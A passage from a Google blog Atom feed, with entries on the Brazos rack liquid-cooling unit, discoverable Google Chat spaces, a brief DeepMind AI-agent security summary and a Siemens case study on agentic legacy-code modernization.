        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: Brazos OCP ORV3 Sidecar Configuration showing three units providing cooling to an adjacent IT rack.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Brazos functions as a self-contained liquid ecosystem, capturing heat via liquid at the component level and rejecting it into the data center's hot aisle using high-efficiency liquid-to-air heat exchangers.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;This plug-and-play architecture can be rapidly installed in any legacy facility that has sufficient power and standard air handling.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="image2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image2_9FaZN3B.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 2: Photograph of three Brazos modular units in a sidecar rack.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  





      &lt;h3&gt;&lt;b&gt;System design and technical specifications&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Brazos is a modular system that includes three cooling units and integrated rack manifolds, all engineered for high reliability. Each modular chassis occupies 11 Open Units (OU) of rack height and interfaces with standard Open Compute Project (OCP) ORv3 form-factor racks. Key design and performance parameters include:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Rack thermal capacity&lt;/b&gt;: Supports a 60 kW nominal thermal load per rack across three modular units&lt;/li&gt;&lt;li&gt;&lt;b&gt;Coolant compatibility&lt;/b&gt;: Runs using either deionized (DI) water or a 25% propylene glycol mixture (PG25)&lt;/li&gt;&lt;li&gt;&lt;b&gt;Power delivery&lt;/b&gt;: Operates on a 40–60 V DC input designed to connect directly with standard rack busbars&lt;/li&gt;&lt;li&gt;&lt;b&gt;Safety features&lt;/b&gt;: Certified to UL/CSA/IEC 62368-1 standards and features built-in leak detection alongside pressure relief valves&lt;/li&gt;&lt;li&gt;&lt;b&gt;Control plane&lt;/b&gt;: Local monitoring uses a built-in human-machine interface (HMI), while remote management connects via Modbus over TCP&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The mechanical design prioritizes field serviceability. The chassis sits on low-friction slides so it can easily be extended for rapid component access. Crucial components like pumps and fans are designed as hot-swappable, field-replaceable units (FRUs) to minimize mean time to repair (MTTR).&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Rapid deployment and industry adoption&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the coming months, we will formally open-source the technical specifications, design principles, and visual assets of Brazos through industry forums. As part of a broader infrastructure portfolio that continues to leverage waterless air-cooled systems alongside liquid cooling, Brazos represents one of many innovations we are contributing to the open hardware ecosystem. We invite system architects, manufacturers, and thermal engineers to evaluate these designs to scale rack-mounted cooling infrastructure for the high-power computing demands of the future.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Next steps&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To optimize your legacy data center infrastructure for liquid cooling, follow our upcoming open-source design submissions through the &lt;/span&gt;&lt;a href="http://opencompute.org" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Open Compute Project&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; forum.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/systems/brazos-liquid-cooling-system-for-air-cooled-data-centers/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-16T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/securing-the-future-of-ai-agents</id>
    <title>Securing the future of AI agents</title>
    <updated>2026-06-16T15:46:31+00:00</updated>
    <content type="html">Securing internal systems with an AI Control Roadmap, combining traditional safeguards and real-time monitoring.</content>
    <link href="https://deepmind.google/blog/securing-the-future-of-ai-agents" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-16T15:46:31+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/securing-the-future-of-ai-agents/</id>
    <title>Securing the future of AI agents</title>
    <updated>2026-06-16T15:46:31+00:00</updated>
    <content type="html">Securing internal systems with an AI Control Roadmap, combining traditional safeguards and real-time monitoring.</content>
    <link href="https://deepmind.google/blog/securing-the-future-of-ai-agents/" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-16T15:46:31+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/discoverable-space-setting-chat.html</id>
    <title>New discoverable space setting in Google Chat</title>
    <updated>2026-06-16T14:09:16+00:00</updated>
    <content type="html">Google Chat is expanding how users can find and join spaces by adding a third access option called "Discoverable."&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Previously, spaces were either private (invite-only) or open (anyone in the organization can find and join). Discoverable spaces provide a new option between the two: they appear when users browse for spaces within their organization, but the conversation history and messages remain private until an owner or manager approves a user's request to join.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This update helps organization leaders and community managers build groups  that are easy to find without sacrificing data privacy. For instance, this setup is ideal for employee resource groups, specialized internal committees, or project teams that want to maintain an organization-facing presence but require membership vetting before sharing ongoing discussions.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPLiDy4-byDEocerUQvgmrL4I4Zhp8vHX-3KTyDiy1BQCkA1W84usBLlJL20_hhOkZmbo-SHlocKZVXi-0K_GYMKGiragPUqqec3K2wq6WDiixaoQXAblGc63QX6aIzEdbHO472EdANTq5Olkuc1DYNMGuwMXXYAo8TVOE7kADFa35oNdscl88lQbBBxfc/s2048/Discoverable%20Spaces.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Space settings showing three access types" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPLiDy4-byDEocerUQvgmrL4I4Zhp8vHX-3KTyDiy1BQCkA1W84usBLlJL20_hhOkZmbo-SHlocKZVXi-0K_GYMKGiragPUqqec3K2wq6WDiixaoQXAblGc63QX6aIzEdbHO472EdANTq5Olkuc1DYNMGuwMXXYAo8TVOE7kADFa35oNdscl88lQbBBxfc/s16000/Discoverable%20Spaces.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Space settings showing three access types&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Additionally, for customers that allow sharing spaces with multiple groups of users, advanced settings can be used to mix and match different groups of users for who can find and join the space.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;b&gt;Note: &lt;/b&gt;Space access types are only in space settings for now, but we will also extend them to space creation in the future.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Space owners and managers can update this option by navigating to their existing space settings. Visit the Help Center to &lt;a href="https://support.google.com/chat/answer/11971020" target="_blank"&gt;learn more about changing space access levels&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) starting on June 15, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;API and mobile support will follow within the next month. Stay tuned to &lt;a href="https://developers.google.com/workspace/chat/release-notes" target="_blank"&gt;API release notes&lt;/a&gt;.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/chat/optimize-spaces-for-your-organization" target="_blank"&gt;Optimize spaces for your organization&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Chat Help: &lt;a href="https://support.google.com/chat/answer/13340792?hl=en&amp;amp;co=GENIE.Platform%3DDesktop" target="_blank"&gt;Manage space settings&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Chat Help: &lt;a href="https://support.google.com/chat/answer/11971020?hl=en&amp;amp;co=GENIE.Platform%3DDesktop&amp;amp;oco=0" target="_blank"&gt;Change the space access level&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/discoverable-space-setting-chat.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-16T14:09:16+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/discoverable-space-setting-chat.html</id>
    <title>New discoverable space setting in Google Chat</title>
    <updated>2026-06-16T14:09:16+00:00</updated>
    <content type="html">Google Chat is expanding how users can find and join spaces by adding a third access option called "Discoverable."&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Previously, spaces were either private (invite-only) or open (anyone in the organization can find and join). Discoverable spaces provide a new option between the two: they appear when users browse for spaces within their organization, but the conversation history and messages remain private until an owner or manager approves a user's request to join.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This update helps organization leaders and community managers build groups  that are easy to find without sacrificing data privacy. For instance, this setup is ideal for employee resource groups, specialized internal committees, or project teams that want to maintain an organization-facing presence but require membership vetting before sharing ongoing discussions.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPLiDy4-byDEocerUQvgmrL4I4Zhp8vHX-3KTyDiy1BQCkA1W84usBLlJL20_hhOkZmbo-SHlocKZVXi-0K_GYMKGiragPUqqec3K2wq6WDiixaoQXAblGc63QX6aIzEdbHO472EdANTq5Olkuc1DYNMGuwMXXYAo8TVOE7kADFa35oNdscl88lQbBBxfc/s2048/Discoverable%20Spaces.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Space settings showing three access types" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPLiDy4-byDEocerUQvgmrL4I4Zhp8vHX-3KTyDiy1BQCkA1W84usBLlJL20_hhOkZmbo-SHlocKZVXi-0K_GYMKGiragPUqqec3K2wq6WDiixaoQXAblGc63QX6aIzEdbHO472EdANTq5Olkuc1DYNMGuwMXXYAo8TVOE7kADFa35oNdscl88lQbBBxfc/s16000/Discoverable%20Spaces.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Space settings showing three access types&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Additionally, for customers that allow sharing spaces with multiple groups of users, advanced settings can be used to mix and match different groups of users for who can find and join the space.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;b&gt;Note: &lt;/b&gt;Space access types are only in space settings for now, but we will also extend them to space creation in the future.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Space owners and managers can update this option by navigating to their existing space settings. Visit the Help Center to &lt;a href="https://support.google.com/chat/answer/11971020" target="_blank"&gt;learn more about changing space access levels&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) starting on June 15, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;API and mobile support will follow within the next month. Stay tuned to &lt;a href="https://developers.google.com/workspace/chat/release-notes" target="_blank"&gt;API release notes&lt;/a&gt;.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/chat/optimize-spaces-for-your-organization" target="_blank"&gt;Optimize spaces for your organization&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Chat Help: &lt;a href="https://support.google.com/chat/answer/13340792?hl=en&amp;amp;co=GENIE.Platform%3DDesktop" target="_blank"&gt;Manage space settings&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Chat Help: &lt;a href="https://support.google.com/chat/answer/11971020?hl=en&amp;amp;co=GENIE.Platform%3DDesktop&amp;amp;oco=0" target="_blank"&gt;Change the space access level&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/discoverable-space-setting-chat.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-16T14:09:16+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/how-siemens-sliced-the-elephant-modernizing-legacy-code-with-agentic-workflows/</id>
    <title>How Siemens "slices the elephant," advancing agentic workflows for industrial software development</title>
    <updated>2026-06-16T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For technology companies like Siemens, software is the nervous system of factories, energy grids, and transportation networks worldwide.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a global leader in industrial AI, industrial software, and industrial automation, Siemens brings decades of domain expertise across factory and process automation, energy infrastructure, and intelligent transportation — expertise that no off-the-shelf AI solution can replicate. But innovation carries a heavy anchor: legacy code. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With codebases spanning hundreds of millions of lines developed for over more than a decade, Siemens faced a challenge that standard AI tools couldn't solve: understanding and modernizing this code and the applications which run on it. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The scale and depth of industrial-grade software demand a fundamentally different approach. Existing coding assistants lacked the contextual depth required to navigate complex, multi-layered industrial codebases — a gap Siemens set out to close.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To solve this, Siemens and Google Cloud created Knowledge Fabric&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;an AI system for automating the software development lifecycle. It was built using knowledge graphs on Spanner Graph, the Google Agent Development Kit, Gemini API,  Agent Platform, Gemini CLI, and Anthropic Claude Code. In a pilot migrating existing frontiers to web-based interfaces, Knowledge Fabric reduced implementation effort, freeing engineers to focus on customer innovations while maintaining full system compatibility.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“By ingesting the entire software ecosystem into an intelligent agentic system equipped with custom knowledge graphs, we aren’t just helping developers optimize their development time; we are enabling autonomous agents to reason across the past to build the future,” said &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Franz Menzl, senior vice president, product creation excellence at Siemens.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; “This is about freeing engineers from repetitive work so they can focus on higher-value problem solving.”&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge: the complexity industrial software&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Modernizing large-scale industrial-grade software systems&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; is often compared to rebuilding a jet while flying it. For Siemens, the challenge had four dimensions:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Scale:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The repositories are massive — far exceeding the context windows of standard large language models.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Fragmentation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Critical knowledge was scattered across code, Jira tickets, Confluence pages, and scanned PDF manuals from the early 2000s.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Complexity:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Tracing the link between a specific line of code and a functional requirement document from 10 years ago presented a challenge that no manual or conventional tooling approach could address efficiently. It’s a reality shared across the industry.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Responsibility:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Systems must adhere to strict quality, compliance, and lifecycle requirements, often over 15 to 20 years of operation. AI‑generated outputs must therefore be explainable, traceable, and verifiable. Hallucinated or unvalidated changes are not merely inefficient but operationally unacceptable.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"We realized that standard RAG (retrieval-augmented generation) wasn't enough," said Agata Gołębiowska, technical lead, Google Cloud. "Code isn't just text; it has inherent structure. A class belongs to a file, which belongs to a module. Flattening that into a vector database meant losing the representation of relationships elements of the codebase."&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution: &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;A domain-aware Knowledge Fabric&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make this sprawling software environment navigable for AI-driven workflows, the teams built the Knowledge Fabric agent. This agent goes beyond keyword matching to “understand” the relationships between assets.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We use Spanner Graph to model the inherent structure of the codebase, applying the same rigor to documentation across formats. By mapping connections between these domains, we can link specific code snippets directly to requirements in a design document. Agents then traverse this graph, using tools to query the structure via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/reference/standard-sql/graph-intro"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Graph Query Language (GQL)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But GQL is only one piece. To enable semantic understanding, we generate embeddings for every node, using Spanner's &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/find-approximate-nearest-neighbors"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Approximate Nearest Neighbors (ANN)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; algorithm to perform efficient vector search across the full codebase. Finally, we give agents &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/spanner-graph-full-text-search?e=0"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;full-text search&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; capabilities, which can be combined with GQL to pinpoint nodes and edges with precision.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2-diagram" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2-diagram.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Combining these three methods lets an LLM agent answer complex queries, such as: &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Which functions need to be updated if I change the logic in the Axis Control Panel?"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; The system traverses the graph — weighing keyword and semantic similarity — to identify dependencies, retrieve relevant documentation, and present a precise impact analysis.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This precise context is what lets a coding agent produce a valid, usable, and maintainable implementation.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;"Slicing the elephant:" the agentic workflow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A key insight from the project was that AI agents struggle with massive, ambiguous tasks. To succeed, the team adopted a design pattern dubbed "slicing the elephant."&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The system breaks a sweeping request like “refactor this module” into smaller, more manageable tasks, each handled by a specialized agent built with the Google Agent Development Kit (ADK):&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Search agent:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Acts as a deep-research specialist. It uses tools to explore the code graph and cross-reference findings with documentation in &lt;/span&gt;&lt;a href="https://cloud.google.com/products/gemini-enterprise-agent-platform/agent-search?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Search&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;User story agent:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Interviews the product owner to gather requirements, then drafts detailed user stories with acceptance criteria linked to existing system contexts.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Architecture impact agent:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Analyzes proposed changes against the graph to predict side effects before a single line of code is written.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Task breakdown agent: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Consumes the analysis from the architecture impact agent and breaks the work into small, manageable tasks, each carrying all the context relevant to a specific change.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Coding agent: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Implements the change described in a specific task. Reaching this step without context and prior analysis  produces unusable code.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The system keeps a human in the loop at every step, which ensures reliable, production‑grade outcomes and keeps engineers focused on meaningful work rather than routine implementation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"By slicing the elephant — breaking complex refactoring jobs into smaller, agent-led tasks — we observed a significant productivity increase," said Alexander Lomakin, project lead at Siemens. "We essentially gave the AI the roadmap it needed to navigate the complexity."&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Pilot results: Faster, more efficient engineering&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developers saw results almost immediately.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Analyzing dependencies for a new feature once required senior engineers to spend several days navigating codebases and legacy documentation. With the Knowledge Fabric, the same work now takes far less time.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In a recent production pilot migrating legacy control panels to modern web‑based interfaces, the Knowledge Fabric reduced overall coding effort while preserving system integrity and industrial quality standards. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Engineers now spend more time creating customer value and less on repetitive work.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Knowledge Fabric shows that generative AI can do more than write boilerplate code, it can also help teams modernize the legacy systems their businesses depend on most.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more about building graph-based agents for your own legacy modernization:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Read about &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/the-unified-graph-solution-with-spanner-graph-and-bigquery-graph"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Explore &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and find pre-built &lt;/span&gt;&lt;a href="https://x.com/GoogleCloudTech/status/2048066787233943773" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;production-grade agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on Agent &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/build/agent-garden"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Garden&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Check out the &lt;/span&gt;&lt;a href="https://adk.dev/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Development Kit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.siemens.com/en-us/company/artificial-intelligence/industrial-ai/" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Read more&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on how Siemens is advancing industrial AI.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt; &lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/how-siemens-sliced-the-elephant-modernizing-legacy-code-with-agentic-workflows/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-16T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/06/Android-17.html</id>
    <title>Android 17 is here</title>
    <updated>2026-06-16T13:00:00+00:00</updated>
